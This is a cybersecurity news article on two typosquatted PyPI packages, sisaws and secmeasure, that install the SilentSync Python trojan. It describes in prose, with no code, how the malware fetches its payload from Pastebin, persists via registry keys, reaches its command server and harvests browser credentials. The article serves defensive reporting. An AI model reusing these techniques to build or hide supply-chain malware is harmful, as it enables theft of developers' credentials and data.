New Python Trojan “SilentSync” Found on PyPI

Experts from Zscaler ThreatLabz have uncovered two malicious packages in the PyPI repository that, upon installation and import, secretly deploy the SilentSync Python trojan—a threat capable of seizing control of developer environments and exfiltrating sensitive data.

Both packages relied on typosquatting—the deliberate imitation of popular library names with minor alterations, designed to deceive developers and slip the trojan into their systems. SilentSync is built for data theft and remote device control: it can execute commands from its command-and-control server, upload and download files, capture screenshots, and extract browser data. Although initially tailored for Windows, it includes modules ensuring persistence on Linux and macOS as well.

The malicious activity begins as soon as the library is imported. In the case of the sisaws package, the trojan masquerades as a wrapper for the Argentinian SISA API, complete with modules named puco and renaper supposedly intended for handling personal identifiers. In reality, when the hidden gen_token function is invoked, an obfuscated script executes a curl command that fetches helper.py from Pastebin. This script deploys SilentSync, embedding it into Windows autostart via registry keys.

A similar strategy is employed in the secmeasure library, ostensibly designed for string sanitization. Behind benign-looking functions such as sanitize_input and strip_whitespace lurks the same malicious mechanism. Some of these functions even trigger deliberate errors on invocation, intended to mislead during superficial code reviews.

SilentSync connects to its command server over HTTP on port 5000, decoding the server’s address from a Base64 string. It regularly sends heartbeat signals, requests tasks, uploads stolen files, and transmits operation results. Supported instructions include executing shell commands, compressing and exfiltrating directories, taking screenshots, and harvesting data from Chrome, Brave, Edge, and Firefox—ranging from credentials to browsing history and autofill data. After completing its activities, the trojan attempts to erase its traces to evade detection.

Since their emergence on August 3 and 4, the malicious packages have already seen four separate releases, underscoring the rapid evolution of the tool. This pace significantly heightens the risk of compromise through third-party dependencies and highlights the critical need for rigorous vetting of external libraries. Recommended safeguards include checksum validation, reputation-based filtering, and isolated testing environments.

The SilentSync incident serves as yet another stark reminder of the inherent vulnerabilities within the open-source ecosystem and the ever-present danger of malicious components infiltrating trusted code distribution platforms.

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy